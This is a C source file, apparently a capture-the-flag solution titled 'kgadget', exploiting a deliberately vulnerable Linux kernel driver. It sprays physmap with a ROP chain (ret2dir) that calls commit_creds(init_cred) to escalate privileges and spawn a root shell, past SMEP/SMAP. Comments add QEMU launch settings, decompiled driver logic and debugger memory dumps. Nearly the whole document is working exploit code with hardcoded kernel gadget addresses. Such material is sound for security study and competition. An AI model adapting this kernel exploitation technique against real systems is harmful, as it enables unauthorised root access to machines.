miniL2022_kgadget_exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>

#define module		"/dev/kgadget"
#define CMD		0x1bf52
#define PAGE_SIZE	4096
#define pop_rsp		0xffffffff811483d0
#define physmap_start  	0xffff888000000000
#define pop_rdi		0xffffffff8108c6f0
#define init_cred	0xffffffff82a6b700				/*gef> x/gx &init_cred -> 0xffffffff82a6b700:	0x0000000000000004 */
#define swapgs		0xffffffff81c00fb0 + 27
#define commit_creds	0xffffffff810c92e0
#define add_rsp		0xffffffff810737fe
#define ret		0xffffffff8108c6f1

int fd;
unsigned long target;
unsigned long* spray[16000];

unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
}

void win(){
	system("/bin/sh");
	exit(0);
}

void ropchainer(unsigned long* rop){
	int idx = 0;
	// Used for hitting the ROPCHAIN
	for (; idx < (PAGE_SIZE / 8 - 0x30); idx++){rop[idx] = add_rsp;}
	
	// Padding
	for (; idx < (PAGE_SIZE / 8 - 0x10); idx++){rop[idx] = ret;}

	// commit_creds ropchain
	rop[idx++] = pop_rdi; 
	rop[idx++] = init_cred;
	rop[idx++] = commit_creds;
	rop[idx++] = swapgs;
	rop[idx++] = 0;
	rop[idx++] = 0;
	rop[idx++] = (unsigned long)win;
	rop[idx++] = user_cs;
	rop[idx++] = user_rflags;
	rop[idx++] = user_sp;
	rop[idx++] = user_ss;
}


int main(){
	save_state();
	fd = open(module, O_RDWR);
	if (fd < 0) {perror("Cannot Open Device Driver\n"); exit(-1);}
	
	spray[0] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 	// Allocate a page to store ROPCHAIN
	ropchainer(spray[0]);										// Build the ROPCHAIN		
	for(int i = 1; i < 15000; i++){
		spray[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);	// Fill the physmap memory with ROPCHAIN
		if(!spray[i]){perror("Out of Memory"); exit(-1);}
		memcpy(spray[i], spray[0], PAGE_SIZE);
	}
	
	
	target = physmap_start + 0x7000000;

	// ret2dir shellcode
	__asm__(
	"mov r15,   0xdeadbeef;"
	"mov r14,   0xdeadbeef;"
	"mov r13,   0xdeadbeef;"
	"mov r12,   0xdeadbeef;"
	"mov rbp,   0xdeadbeef;"
	"mov rbx,   0xdeadbeef;"
	"mov r11,   0xdeadbeef;"
	"mov r10,   0xdeadbeef;"
	"mov r9,    0xffffffff811483d0;"
	"mov r8,    target;"
	"mov rax,   0x10;"
	"mov rcx,   0xdeadbeef;"
	"mov rdx,   target;"
	"mov rsi,   0x1bf52;"
	"mov rdi,   fd;"
	"syscall"
	);

	return 0;
}


/*
qemu-system-x86_64 \
	-m 256M \
	-cpu kvm64,+smep,+smap \
	-smp cores=2,threads=2 \
	-kernel bzImage \
	-initrd ./rootfs.cpio \
	-nographic \
	-monitor /dev/null \
	-snapshot \
	-append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \
	-no-reboot -s

SMEP SMAP Enabled
No KASLR
*/

/*
00000173      if (rsi_1 != 0x1bf52)
00000207          printk(0x490)
0000020c          rax_5 = -1
00000173      else
00000186          printk(0x3e0, *rdx_2)
00000192          printk(0x410)
00000197          int64_t* var_20 = &var_20
000001ac          void* rax_4 = &var_20[0x200] & 0xfffffffffffff000
000001b9          var_20 = rax_4 - 0xa8
000001c7          __builtin_strncpy(dest: rax_4 - 0xa8, src: "arttnba3arttnba3arttnba3arttnba3arttnba3arttnba3", n: 0x30)
000001ee          __builtin_strncpy(dest: rax_4 - 0x70, src: "arttnba3", n: 8)
000001f2          printk(0x468)
000001f7          __x86_indirect_thunk_rbx()	// similar to call rbx
000001fc          rax_5 = 0
*/


/*
gef> x/20gx 0xffff888007000000
0xffff888007000000:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000010:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000020:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000030:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000040:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000050:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000060:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000070:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000080:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
0xffff888007000090:	0x7a7a7a7a7a7a7a7a	0x7a7a7a7a7a7a7a7a
*/